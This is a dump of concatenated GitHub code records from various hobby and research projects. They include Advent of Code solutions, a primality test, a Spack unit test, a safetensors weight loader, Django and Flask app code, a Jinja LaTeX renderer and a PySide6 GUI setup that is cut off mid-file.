my_matching_beacons[0]\n their_b0 = their_matching_beacons[0]\n \n other.rotate(t)\n \n translation = my_b0.array_value() - their_b0.array_value()\n # print(translation)\n other.translate(translation)\n\n return True\n else:\n return None\n \n\ndef parse_input():\n scanners = []\n s = None\n for line in input:\n if line[:3] == \"---\":\n n = int(line.split(\" \")[2])\n # print(n)\n s = Scanner(n)\n elif line == \"\":\n # print(s)\n scanners.append(s)\n s = None\n else:\n [x,y,z] = [int(v) for v in line.split(\",\")]\n p = Beacon(x, y, z)\n s.beacons.append(p)\n\n scanners.append(s)\n # print(s)\n return scanners\n \n\n\ndef orient_scanners():\n\n scanners = parse_input()\n # print(scanners)\n \n for scanner in scanners:\n scanner.calc_distances()\n \n \n queue = [scanners[0]]\n \n disoriented_scanners = scanners[1:]\n \n while queue:\n o = queue.pop()\n still_disoriented = []\n for d in disoriented_scanners:\n did_realign = o.align_other_to_self(d)\n if did_realign:\n queue.append(d)\n # print()\n # print(\"Realigned!\", d)\n else:\n still_disoriented.append(d)\n disoriented_scanners = still_disoriented\n return scanners\n\ndef part1():\n scanners = orient_scanners()\n \n out_set = set()\n for s in scanners:\n for b in s.beacons:\n out_set.add((b.x,b.y,b.z))\n \n return len(out_set)\n \ndef part2():\n scanners = orient_scanners()\n \n print(\"Lenght: \", len(scanners))\n max_dist = 0\n for i in range(len(scanners)-1):\n for j in range(i+1, len(scanners)):\n print(i,j)\n a = scanners[i]\n b = scanners[j]\n dist = a.manhattan_distance_to(b)\n\n print(a.location, b.location)\n print(a.location - b.location)\n print(abs(dist))\n\n if abs(dist) > max_dist:\n max_dist = abs(dist)\n \n return max_dist\n\n\n# --- #\n\nif __name__ == \"__main__\":\n utils.funWrapper(part1, \"Part 1\")\n utils.funWrapper(part2, \"Part 2\")","repo_name":"jtbthethird/adventofcode","sub_path":"2021/day19.py","file_name":"day19.py","file_ext":"py","file_size_in_byte":7875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"34852548279","text":"from sys import maxsize\nfrom random import randint\n\n\ndef rand():\n return randint(0, maxsize)\n\n\ndef f(x, y, n):\n if y == 0:\n return 1\n if y == 1:\n return x\n w = f(x, int(y/2), n)\n w = (w * w) % n\n if y % 2 == 1:\n w = (w * x) % n\n return w\n\n\ndef prime(a) -> bool:\n if a == 2:\n return True\n for i in range(1, 5+1):\n b = rand() % (a - 2) + 2\n if f(b, a-1, a) != 1:\n return False\n return True\n\n\nif __name__ == \"__main__\":\n print(prime(13))\n","repo_name":"P79N6A/daily-practice","sub_path":"code/python/algorithms/miller_rabin.py","file_name":"miller_rabin.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17869529184","text":"import pytest\nimport spack.store\nimport spack.cmd.uninstall\n\n\nclass MockArgs(object):\n\n def __init__(self, packages, all=False, force=False, dependents=False):\n self.packages = packages\n self.all = all\n self.force = force\n self.dependents = dependents\n self.yes_to_all = True\n\n\ndef test_uninstall(database):\n parser = None\n uninstall = spack.cmd.uninstall.uninstall\n # Multiple matches\n args = MockArgs(['mpileaks'])\n with pytest.raises(SystemExit):\n uninstall(parser, args)\n # Installed dependents\n args = MockArgs(['libelf'])\n with pytest.raises(SystemExit):\n uninstall(parser, args)\n # Recursive uninstall\n args = MockArgs(['callpath'], all=True, dependents=True)\n uninstall(parser, args)\n\n all_specs = spack.store.layout.all_specs()\n assert len(all_specs) == 7\n # query specs with multiple configurations\n mpileaks_specs = [s for s in all_specs if s.satisfies('mpileaks')]\n callpath_specs = [s for s in all_specs if s.satisfies('callpath')]\n mpi_specs = [s for s in all_specs if s.satisfies('mpi')]\n\n assert len(mpileaks_specs) == 0\n assert len(callpath_specs) == 0\n assert len(mpi_specs) == 3\n","repo_name":"Mattlk13/spack","sub_path":"lib/spack/spack/test/cmd/uninstall.py","file_name":"uninstall.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"22002937380","text":"from glob import glob\nfrom os import path\nfrom typing import *\n\nimport torch\nfrom safetensors import safe_open\n\n\nclass Weights:\n def __init__(\n self,\n model_name_or_path: str,\n device: torch.device,\n dtype: torch.dtype,\n quantize_method: Optional[str] = None,\n gptq_model_base_name: Optional[str] = None\n ):\n if not path.isdir(model_name_or_path):\n raise NotADirectoryError(f\"{model_name_or_path} not exists.\")\n routing = {}\n file_pattern = \"*.safetensors\"\n if quantize_method == \"gptq\":\n file_pattern = \"gptq_model*.safetensors\"\n if gptq_model_base_name:\n file_pattern = f\"{gptq_model_base_name}*.safetensors\"\n for model_file in glob(path.join(model_name_or_path, file_pattern)):\n with safe_open(model_file, framework=\"pt\") as f:\n for k in f.keys():\n if k in routing:\n raise RuntimeError(\n f\"Key {k} was found in multiple files: {model_file} and {routing[k]}\"\n )\n routing[k] = model_file\n self.routing = routing\n self.device = device\n self.dtype = dtype\n self._handles = {}\n\n def _get_handle(self, filename: str):\n if filename not in self._handles:\n f = safe_open(filename, framework=\"pt\")\n self._handles[filename] = f\n\n return self._handles[filename]\n\n def get_filename(self, tensor_name: str) -> (str, str):\n filename = self.routing.get(tensor_name, None)\n if filename is None:\n raise RuntimeError(f\"weight {tensor_name} does not exist\")\n return str(filename), tensor_name\n\n def _get_slice(self, tensor_name: str):\n filename, tensor_name = self.get_filename(tensor_name)\n f = self._get_handle(filename)\n slice_ = f.get_slice(tensor_name)\n return slice_\n\n def get_shape(self, tensor_name: str):\n return self._get_slice(tensor_name).get_shape()\n\n def get_tensor(self, tensor_name: str):\n filename, tensor_name = self.get_filename(tensor_name)\n f = self._get_handle(filename)\n tensor = f.get_tensor(tensor_name)\n # Special case for gptq which shouldn't convert\n # u4 which are disguised as int32\n if tensor.dtype not in [torch.int32, torch.int64]:\n tensor = tensor.to(dtype=self.dtype)\n tensor = tensor.to(device=self.device)\n return tensor\n\n def get_gptq_weight(self, prefix: str):\n try:\n qweight = self.get_tensor(f\"{prefix}.qweight\")\n except RuntimeError:\n raise RuntimeError(\n \"Cannot load `gptq` weight, make sure the model is already quantized, or quantize it with `text-generation-server quantize ORIGINAL_MODEL_ID NEW_MODEL_ID`\"\n )\n qzeros = self.get_tensor(f\"{prefix}.qzeros\")\n scales = self.get_tensor(f\"{prefix}.scales\")\n g_idx = self.get_tensor(f\"{prefix}.g_idx\")\n try:\n bias = self.get_tensor(f\"{prefix}.bias\")\n except:\n bias = None\n\n return qweight, qzeros, scales, g_idx, bias\n","repo_name":"modelize-ai/LLM-Inference-Deployment-Tutorial","sub_path":"code/server/continuous_batching_server/modeling/utils/weights.py","file_name":"weights.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"66"} +{"seq_id":"23491120776","text":"# Python 3.6.1\n\nfrom collections import deque\nfrom itertools import cycle\n\n\nwith open(\"input.txt\", \"r\") as f:\n puzzle_input = [int(i) for i in f.read().split()]\n\n\ndef main():\n frequencies = set()\n freq = 0\n\n for i in cycle(puzzle_input):\n if freq in frequencies:\n return freq\n frequencies.add(freq)\n freq += i\n\n\nprint(main())\n","repo_name":"foxscotch/advent-of-code","sub_path":"2018/01/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18628598762","text":"from flask_script import Manager\nfrom songbase import app, db, Author, Book\n\nmanager = Manager(app)\n\n\n@manager.command\ndef deploy():\n print (\"resetting database\")\n db.drop_all()\n db.create_all()\n\n print (\"inserting initial data\")\n rowling = Author(name=\"JK Rowling\", about=\"this is jk rowling\")\n austin = Author(name=\"Jane Austin\", about=\"this is jane\")\n lee = Author(name=\"Harper Lee\", about=\"this is harper\")\n potter = Song(name='Harry Potter', year=1997, author=rowling)\n pride= Song(name='Pride and Prejudice', year=1813, author=austin)\n mockingbird = Song(name='To Kill a Mockingbird', year=1960, author=lee)\n\n db.session.add(rowling)\n db.session.add(austin)\n db.session.add(lee)\n db.session.add(potter)\n db.session.add(pride)\n db.session.add(mockingbird)\n\n db.session.commit()\n\n\nif __name__ == '__main__':\n manager.run()\n","repo_name":"judyyang123/final-project","sub_path":"manage.py","file_name":"manage.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71370102612","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponseRedirect, JsonResponse\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import SignUpForm, UpdateUserForm, UpdateUserProfileForm, PostForm, CommentForm\nfrom django.contrib.auth import login, authenticate\nfrom .models import Post, Comment, Profile, Follow\nfrom django.contrib.auth.models import User\nfrom django.template.loader import render_to_string\nfrom django.views.generic import RedirectView\n\n# Create your views here.\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect('index')\n else:\n form = SignUpForm()\n return render(request, 'registration/signup.html', {'form': form})\n\n@login_required(login_url='login')\ndef index(request):\n images = Post.objects.all()\n users = User.objects.exclude(id=request.user.id)\n if request.method == 'POST':\n form = PostForm(request.POST, request.FILES)\n if form.is_valid():\n post = form.save(commit=False)\n post.user = request.user.profile\n post.save()\n return HttpResponseRedirect(request.path_info)\n else:\n form = PostForm()\n params = {\n 'images': images,\n 'form': form,\n 'users': users,\n\n }\n return render(request, 'gram_temp/index.html', params)\n\n\n@login_required(login_url='login')\ndef profile(request, username):\n images = request.user.profile.posts.all()\n if request.method == 'POST':\n user_form = UpdateUserForm(request.POST, instance=request.user)\n prof_form = UpdateUserProfileForm(request.POST, request.FILES, instance=request.user.profile)\n if user_form.is_valid() and prof_form.is_valid():\n user_form.save()\n prof_form.save()\n return HttpResponseRedirect(request.path_info)\n else:\n user_form = UpdateUserForm(instance=request.user)\n prof_form = UpdateUserProfileForm(instance=request.user.profile)\n params = {\n 'user_form': user_form,\n 'prof_form': prof_form,\n 'images': images,\n\n }\n return render(request, 'gram_temp/profile.html', params)\n\n\n@login_required(login_url='login')\ndef user_profile(request, username):\n user_prof = get_object_or_404(User, username=username)\n if request.user == user_prof:\n return redirect('profile', username=request.user.username)\n user_posts = user_prof.profile.posts.all()\n \n followers = Follow.objects.filter(followed=user_prof.profile)\n follow_status = None\n for follower in followers:\n if request.user.profile == follower.follower:\n follow_status = True\n else:\n follow_status = False\n params = {\n 'user_prof': user_prof,\n 'user_posts': user_posts,\n 'followers': followers,\n 'follow_status': follow_status\n }\n print(followers)\n return render(request, 'gram_temp/user_profile.html', params)\n\n\n@login_required(login_url='login')\ndef post_comment(request, id):\n image = get_object_or_404(Post, pk=id)\n is_liked = False\n if image.likes.filter(id=request.user.id).exists():\n is_liked = True\n if request.method == 'POST':\n form = CommentForm(request.POST)\n if form.is_valid():\n savecomment = form.save(commit=False)\n savecomment.post = image\n savecomment.user = request.user.profile\n savecomment.save()\n return HttpResponseRedirect(request.path_info)\n else:\n form = CommentForm()\n params = {\n 'image': image,\n 'form': form,\n 'is_liked': is_liked,\n 'total_likes': image.total_likes()\n }\n return render(request, 'gram_temp/single_post.html', params)\n\n\ndef like_post(request):\n # image = get_object_or_404(Post, id=request.POST.get('image_id'))\n image = get_object_or_404(Post, id=request.POST.get('id'))\n is_liked = False\n if image.likes.filter(id=request.user.id).exists():\n image.likes.remove(request.user)\n is_liked = False\n else:\n image.likes.add(request.user)\n is_liked = False\n\n params = {\n 'image': image,\n 'is_liked': is_liked,\n 'total_likes': image.total_likes()\n }\n if request.is_ajax():\n html = render_to_string('gram_temp/like_section.html', params, request=request)\n return JsonResponse({'form': html})\n\n@login_required(login_url='login')\ndef search_profile(request):\n if 'search_user' in request.GET and request.GET['search_user']:\n name = request.GET.get(\"search_user\")\n results = Profile.search_profile(name)\n print(results)\n message = f'name'\n params = {\n 'results': results,\n 'message': message\n }\n return render(request, 'gram_temp/results.html', params)\n else:\n message = \"You haven't searched for any image category\"\n return render(request, 'gram_temp/results.html', {'message': message})\n\ndef unfollow(request, to_unfollow):\n if request.method == 'GET':\n user_profile2 = Profile.objects.get(pk=to_unfollow)\n unfollow_d = Follow.objects.filter(follower=request.user.profile, followed=user_profile2)\n unfollow_d.delete()\n return redirect('user_profile', user_profile2.user.username)\n\n\ndef follow(request, to_follow):\n if request.method == 'GET':\n user_profile3 = Profile.objects.get(pk=to_follow)\n follow_s = Follow(follower=request.user.profile, followed=user_profile3)\n follow_s.save()\n return redirect('user_profile', user_profile3.user.username)","repo_name":"default-007/Snapgram","sub_path":"gram/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5920,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"66"} +{"seq_id":"70409244691","text":"import numpy as np\n\n\ndef plot_landscape(df, nbins=10, symetric=True, cmap='RdBu_r'):\n import matplotlib.pyplot as plt\n\n # get the sizes of the multiplets\n sizes = np.array(list(df['Sizes']))\n usizes = np.unique(sizes)\n\n # get the oinfo\n oinfo = np.array(list(df['Oinfo'] )) * np.array(list(df['Sign']))\n omin, omax = oinfo.min(), oinfo.max()\n if symetric:\n ominmax = max(abs(omin), abs(omax))\n omin, omax = -ominmax, ominmax\n print(omin, omax)\n bins = np.linspace(omin, omax, nbins + 1, endpoint=True)\n\n obins = np.full((nbins, len(usizes)), np.nan)\n for n_m, m in enumerate(usizes):\n oinfo_s = oinfo[sizes == m]\n for n_b in range(nbins - 1):\n indices = np.logical_and(\n bins[n_b] <= oinfo_s, oinfo_s <= bins[n_b + 1])\n if np.any(indices):\n # obins[n_b, n_m] = oinfo_s[indices].mean()\n obins[n_b, n_m] = indices.sum()\n # else:\n # obins[n_b, n_m] = 0.\n\n plt.pcolormesh(usizes, bins, obins, cmap=cmap) # vmin=omin, vmax=omax\n plt.xlabel('Multiplet size')\n plt.ylabel('Oinfo')\n plt.colorbar()\n\n return plt.gca()\n\n\nif __name__ == '__main__':\n import matplotlib.pyplot as plt\n import pandas as pd\n\n file = 'DA_21_genes.xlsx'\n path = '/run/media/etienne/DATA/Toolbox/BraiNets/hoi_bhk/etienne/hoi_bhk/'\n\n df = pd.read_excel(path + file)\n\n obins = plot_landscape(df, nbins=60, cmap='turbo', symetric=False)\n\n\n plt.show()\n","repo_name":"brainets/hoi_bhk","sub_path":"etienne/hoi_bhk/plot_hoi.py","file_name":"plot_hoi.py","file_ext":"py","file_size_in_byte":1507,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"19678180129","text":"import jinja2\nimport os\nimport codecs\nfrom sys import argv\nfrom jinja2 import Template\nimport yaml\nimport io\n\nclass Loader(yaml.Loader):\n\n def __init__(self, stream):\n\n self._root = os.path.split(stream.name)[0]\n\n super(Loader, self).__init__(stream)\n\n def include(self, node):\n\n filename = os.path.join(self._root, self.construct_scalar(node))\n\n with io.open(filename, 'r', encoding='utf8') as f:\n return yaml.load(f, Loader)\n\nLoader.add_constructor('!include', Loader.include)\n\nlatex_jinja_env = jinja2.Environment(\n block_start_string = '\\BLOCK{',\n block_end_string = '}',\n variable_start_string = '\\VAR{',\n variable_end_string = '}',\n comment_start_string = '\\#{',\n comment_end_string = '}',\n line_statement_prefix = '%%',\n line_comment_prefix = '%#',\n trim_blocks = True,\n autoescape = False,\n loader = jinja2.FileSystemLoader(os.path.abspath('.'))\n)\n\ntemplate = latex_jinja_env.get_template('latex/template.tex')\n\nbuild_d = \"{}{}.build\".format(os.path.abspath('.'), os.sep)\ngenerated = \"{}{}generated\".format(os.path.abspath('.'), os.sep)\n\ndef create_folders():\n global build_d\n if not os.path.exists(build_d): # create the build directory if not existing\n os.makedirs(build_d)\n if not os.path.exists(generated): # create the build directory if not existing\n os.makedirs(generated)\n\n\ndef main(datafile):\n global template\n create_folders()\n with open(datafile) as inputfile:\n out_name = os.path.splitext(os.path.basename(datafile))[0] + \".tex\"\n data = yaml.load(inputfile, Loader)\n output_name = os.path.join(generated, out_name)\n with codecs.open(output_name, 'w', \"utf-8\") as outfile:\n outfile.write(template.render(data))\n\nif __name__ == \"__main__\":\n main(datafile=argv[1])\n","repo_name":"rouzbeh/cv","sub_path":"render.py","file_name":"render.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19681800944","text":"# ///////////////////////////////////////////////////////////////\n#\n# BY: WANDERSON M.PIMENTA\n# PROJECT MADE WITH: Qt Designer and PySide6\n# V: 1.0.0\n#\n# This project can be used freely for all uses, as long as they maintain the\n# respective credits only in the Python scripts, any information in the visual\n# interface (GUI) can be modified without any implication.\n#\n# There are limitations on Qt licenses if you want to use your products\n# commercially, I recommend reading them on the official website:\n# https://doc.qt.io/qtforpython/licenses.html\n#\n# ///////////////////////////////////////////////////////////////\n\n# IMPORT PACKAGES AND MODULES\n# ///////////////////////////////////////////////////////////////\nfrom gui.widgets.py_table_widget.py_table_widget import PyTableWidget\nfrom . functions_main_window import *\nimport analyser\nimport sys\nimport os\n\n# IMPORT QT CORE\n# ///////////////////////////////////////////////////////////////\nfrom qt_core import *\n\n# IMPORT SETTINGS\n# ///////////////////////////////////////////////////////////////\nfrom gui.core.json_settings import Settings\n\n# IMPORT THEME COLORS\n# ///////////////////////////////////////////////////////////////\nfrom gui.core.json_themes import Themes\n\n# IMPORT PY ONE DARK WIDGETS\n# ///////////////////////////////////////////////////////////////\nfrom gui.widgets import *\n\n# LOAD UI MAIN\n# ///////////////////////////////////////////////////////////////\nfrom . ui_main import *\n\n# MAIN FUNCTIONS\n# ///////////////////////////////////////////////////////////////\nfrom . functions_main_window import *\n\n# PY WINDOW\n# ///////////////////////////////////////////////////////////////\n\n\nclass SetupMainWindow:\n def __init__(self):\n super().__init__()\n # SETUP MAIN WINDOw\n # Load widgets from \"gui\\uis\\main_window\\ui_main.py\"\n # ///////////////////////////////////////////////////////////////\n self.ui = UI_MainWindow()\n self.ui.setup_ui(self)\n\n # ADD LEFT MENUS\n # ///////////////////////////////////////////////////////////////\n add_left_menus = [\n {\n \"btn_icon\": \"icon_home.svg\",\n \"btn_id\": \"btn_home\",\n \"btn_text\": \"Home\",\n \"btn_tooltip\": \"Home page\",\n \"show_top\": True,\n \"is_active\": True\n },\n {\n \"btn_icon\": \"icon_file.svg\",\n \"btn_id\": \"btn_internet_speed\",\n \"btn_text\": \"Analyse Internet Speed\",\n \"btn_tooltip\": \"Analyse your Network Performance\",\n \"show_top\": True,\n \"is_active\": False,\n },\n {\n \"btn_icon\": \"icon_signal.svg\",\n \"btn_id\": \"btn_dns\",\n \"btn_text\": \"Analyse DNS\",\n \"btn_tooltip\": \"Analyse any Site's DNS\",\n \"show_top\": True,\n \"is_active\": False,\n },\n {\n \"btn_icon\": \"icon_idle.svg\",\n \"btn_id\": \"btn_ping\",\n \"btn_text\": \"Analyse Response Time\",\n \"btn_tooltip\": \"Analyse Response Time\",\n \"show_top\": True,\n \"is_active\": False,\n },\n {\n \"btn_icon\": \"icon_folder.svg\",\n \"btn_id\": \"btn_loading_speed\",\n \"btn_text\": \"Analyse Loading Speed\",\n \"btn_tooltip\": \"Analyse Site Loading Speed\",\n \"show_top\": True,\n \"is_active\": False,\n },\n {\n \"btn_icon\": \"icon_settings.svg\",\n \"btn_id\": \"btn_settings\",\n \"btn_text\": \"Settings\",\n \"btn_tooltip\": \"Settings\",\n \"show_top\": False,\n \"is_active\": False,\n }\n ]\n\n # ADD TITLE BAR MENUS\n # ///////////////////////////////////////////////////////////////\n add_title_bar_menus = [\n {\n \"btn_icon\": \"icon_search.svg\",\n \"btn_id\": \"btn_search\",\n \"btn_tooltip\": \"Search\",\n \"is_active\": False\n },\n {\n \"btn_icon\": \"icon_settings.svg\",\n \"btn_id\": \"btn_top_settings\",\n \"btn_tooltip\": \"Top settings\",\n \"is_active\": False\n }\n ]\n\n # SETUP CUSTOM BTNs OF CUSTOM WIDGETS\n # Get sender() function when btn is clicked\n # ///////////////////////////////////////////////////////////////\n def setup_btns(self):\n if self.ui.title_bar.sender() != None:\n return self.ui.title_bar.sender()\n elif self.ui.left_menu.sender() != None:\n return self.ui.left_menu.sender()\n elif self.ui.left_column.sender() != None:\n return self.ui.left_column.sender()\n\n # SETUP MAIN WINDOW WITH CUSTOM PARAMETERS\n # ///////////////////////////////////////////////////////////////\n def setup_gui(self):\n # APP TITLE\n # ///////////////////////////////////////////////////////////////\n self.setWindowTitle(self.settings[\"app_name\"])\n\n # REMOVE TITLE BAR\n # ///////////////////////////////////////////////////////////////\n if self.settings[\"custom_title_bar\"]:\n self.setWindowFlag(Qt.FramelessWindowHint)\n self.setAttribute(Qt.WA_TranslucentBackground)\n\n # ADD GRIPS\n # ///////////////////////////////////////////////////////////////\n if self.settings[\"custom_title_bar\"]:\n self.left_grip = PyGrips(self, \"left\", self.hide_grips)\n self.right_grip = PyGrips(self, \"right\", self.hide_grips)\n self.top_grip = PyGrips(self, \"top\", self.hide_grips)\n self.bottom_grip = PyGrips(self, \"bottom\", self.hide_grips)\n self.top_left_grip = PyGrips(self, \"top_left\", self.hide_grips)\n self.top_right_grip = PyGrips(self, \"top_right\", self.hide_grips)\n self.bottom_left_grip = PyGrips(self, \"bottom_left\", self.hide_grips)\n self.bottom_right_grip = PyGrips(self, \"bottom_right\", self.hide_grips)\n\n # LEFT MENUS / GET SIGNALS WHEN LEFT MENU BTN IS CLICKED / RELEASED\n # ///////////////////////////////////////////////////////////////\n # ADD MENUS\n self.ui.left_menu.add_menus(SetupMainWindow.add_left_menus)\n\n # SET SIGNALS\n self.ui.left_menu.clicked.connect(self.btn_clicked)\n self.ui.left_menu.released.connect(self.btn_released)\n\n # TITLE BAR / ADD EXTRA BUTTONS\n # ///////////////////////////////////////////////////////////////\n\n # ADD MENUS\n self.ui.title_bar.add_menus(SetupMainWindow.add_title_bar_menus)\n\n # SET SIGNALS\n self.ui.title_bar.clicked.connect(self.btn_clicked)\n self.ui.title_bar.released.connect(self.btn_released)\n\n # ADD Title\n if self.settings[\"custom_title_bar\"]:\n self.ui.title_bar.set_title(self.settings[\"app_name\"])\n else:\n self.ui.title_bar.set_title(\"Welcome to Web Analyser\")\n\n # LEFT COLUMN SET SIGNALS\n # ///////////////////////////////////////////////////////////////\n self.ui.left_column.clicked.connect(self.btn_clicked)\n self.ui.left_column.released.connect(self.btn_released)\n\n # SET INITIAL PAGE / SET LEFT AND RIGHT COLUMN MENUS\n # ///////////////////////////////////////////////////////////////\n MainFunctions.set_page(self, self.ui.load_pages.home)\n MainFunctions.set_left_column_menu(\n self,\n menu=self.ui.left_column.menus.menu_1,\n title=\"Settings Left Column\",\n icon_path=Functions.set_svg_icon(\"icon_settings.svg\")\n )\n MainFunctions.set_right_column_menu(self, self.ui.right_column.menu_1)\n\n # ///////////////////////////////////////////////////////////////\n # EXAMPLE CUSTOM WIDGETS\n # Here are added the custom widgets to pages and columns that\n # were created using Qt Designer.\n # This is just an example and should be deleted when creating\n # your application.\n #\n # OBJECTS FOR LOAD PAGES, LEFT AND RIGHT COLUMNS\n # You can access objects inside Qt Designer projects using\n # the objects below:\n #\n # \n # LEFT COLUMN: self.ui.left_column.menus\n # RIGHT COLUMN: self.ui.right_column\n # LOAD PAGES: self.ui.load_pages\n # \n # ///////////////////////////////////////////////////////////////\n\n # LOAD SETTINGS\n # ///////////////////////////////////////////////////////////////\n settings = Settings()\n self.settings = settings.items\n\n # LOAD THEME COLOR\n # ///////////////////////////////////////////////////////////////\n themes = Themes()\n self.themes = themes.items\n self.ls_input = PyLineEdit(\n place_holder_text=\"Enter site name\",\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n bg_color=self.themes[\"app_color\"][\"dark_one\"],\n )\n self.ls_input.setMinimumHeight(40)\n self.ls_btn_submit = PyPushButton(\n text=\"Submit\",\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n bg_color=self.themes[\"app_color\"][\"dark_one\"],\n bg_color_hover=self.themes[\"app_color\"][\"dark_three\"],\n bg_color_pressed=self.themes[\"app_color\"][\"dark_four\"]\n )\n self.ls_btn_submit.setMinimumHeight(40)\n self.ls_btn_submit.setMaximumWidth(300)\n\n self.ls_table = PyTableWidget(\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n selection_color=self.themes[\"app_color\"][\"context_color\"],\n bg_color=self.themes[\"app_color\"][\"bg_two\"],\n header_horizontal_color=self.themes[\"app_color\"][\"dark_two\"],\n header_vertical_color=self.themes[\"app_color\"][\"bg_three\"],\n bottom_line_color=self.themes[\"app_color\"][\"bg_three\"],\n grid_line_color=self.themes[\"app_color\"][\"bg_one\"],\n scroll_bar_bg_color=self.themes[\"app_color\"][\"bg_one\"],\n scroll_bar_btn_color=self.themes[\"app_color\"][\"dark_four\"],\n context_color=self.themes[\"app_color\"][\"context_color\"]\n )\n self.ls_table.setColumnCount(2)\n self.ls_table.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n self.ls_table.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.ls_table.setSelectionBehavior(QAbstractItemView.SelectRows)\n\n self.column_1 = QTableWidgetItem()\n self.column_1.setText(\"Site Name\")\n\n self.column_2 = QTableWidgetItem()\n self.column_2.setText(\"Loading Speed (sec)\")\n\n # Set column\n self.ls_table.setHorizontalHeaderItem(0, self.column_1)\n self.ls_table.setHorizontalHeaderItem(1, self.column_2)\n\n def ls_on_submit():\n sitename = self.ls_input.text()\n score, data = analyser.compare_load_times(sitename)\n for row in data:\n row_number = self.ls_table.rowCount()\n self.ls_table.insertRow(row_number)\n self.ls_table.setItem(\n row_number, 0, QTableWidgetItem(row[0]))\n self.ls_table.setItem(\n row_number, 1, QTableWidgetItem(str(row[1])))\n\n row_number = self.ls_table.rowCount()\n self.ls_table.insertRow(row_number)\n self.ls_table.setItem(\n row_number, 0, QTableWidgetItem('Score: '))\n self.ls_table.setItem(\n row_number, 1, QTableWidgetItem(str(score)))\n\n self.ls_input.setText(\"\")\n self.ls_btn_submit.clicked.connect(ls_on_submit)\n\n self.ui.load_pages.ls_top_layout.addWidget(self.ls_input)\n self.ui.load_pages.ls_btn_layout.addWidget(self.ls_btn_submit)\n self.ui.load_pages.ls_main_layout.addWidget(self.ls_table)\n\n # RS Starts here\n # /////////////////////////////////////////////////////////////\n self.rs_input = PyLineEdit(\n place_holder_text=\"Enter site name\",\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n bg_color=self.themes[\"app_color\"][\"dark_one\"],\n )\n self.rs_input.setMinimumHeight(40)\n self.rs_btn_submit = PyPushButton(\n text=\"Submit\",\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n bg_color=self.themes[\"app_color\"][\"dark_one\"],\n bg_color_hover=self.themes[\"app_color\"][\"dark_three\"],\n bg_color_pressed=self.themes[\"app_color\"][\"dark_four\"]\n )\n self.rs_btn_submit.setMinimumHeight(40)\n self.rs_btn_submit.setMaximumWidth(300)\n\n self.rs_table = PyTableWidget(\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n selection_color=self.themes[\"app_color\"][\"context_color\"],\n bg_color=self.themes[\"app_color\"][\"bg_two\"],\n header_horizontal_color=self.themes[\"app_color\"][\"dark_two\"],\n header_vertical_color=self.themes[\"app_color\"][\"bg_three\"],\n bottom_line_color=self.themes[\"app_color\"][\"bg_three\"],\n grid_line_color=self.themes[\"app_color\"][\"bg_one\"],\n scroll_bar_bg_color=self.themes[\"app_color\"][\"bg_one\"],\n scroll_bar_btn_color=self.themes[\"app_color\"][\"dark_four\"],\n context_color=self.themes[\"app_color\"][\"context_color\"]\n )\n self.rs_table.setColumnCount(2)\n self.rs_table.horizontalHeader().setSectionResizeMode(QHeaderView.Stretch)\n self.rs_table.setSelectionMode(QAbstractItemView.ExtendedSelection)\n self.rs_table.setSelectionBehavior(QAbstractItemView.SelectRows)\n\n self.column_1 = QTableWidgetItem()\n self.column_1.setText(\"Site Name\")\n\n self.column_2 = QTableWidgetItem()\n self.column_2.setText(\"Response Time (sec)\")\n\n # Set column\n self.rs_table.setHorizontalHeaderItem(0, self.column_1)\n self.rs_table.setHorizontalHeaderItem(1, self.column_2)\n\n def rs_on_submit():\n sitename = self.rs_input.text()\n score, data = analyser.compare_ping(sitename)\n for row in data:\n row_number = self.rs_table.rowCount()\n self.rs_table.insertRow(row_number)\n self.rs_table.setItem(\n row_number, 0, QTableWidgetItem(row[0]))\n self.rs_table.setItem(\n row_number, 1, QTableWidgetItem(str(row[1])))\n\n row_number = self.rs_table.rowCount()\n self.rs_table.insertRow(row_number)\n self.rs_table.setItem(\n row_number, 0, QTableWidgetItem('Score: '))\n self.rs_table.setItem(\n row_number, 1, QTableWidgetItem(str(score)))\n\n self.rs_input.setText(\"\")\n self.rs_btn_submit.clicked.connect(rs_on_submit)\n\n self.ui.load_pages.rs_top_layout.addWidget(self.rs_input)\n self.ui.load_pages.rs_btn_layout.addWidget(self.rs_btn_submit)\n self.ui.load_pages.rs_main_layout.addWidget(self.rs_table)\n\n self.st_btn_submit = PyPushButton(\n text=\"SpeedTest\",\n radius=8,\n color=self.themes[\"app_color\"][\"text_foreground\"],\n bg_color=self.themes[\"app_color\"][\"dark_one\"],\n bg_color_hover=self.themes[\"app_color\"][\"dark_three\"],\n bg_color_pressed=self.themes[\"app_color\"][\"dark_four\"]\n )\n 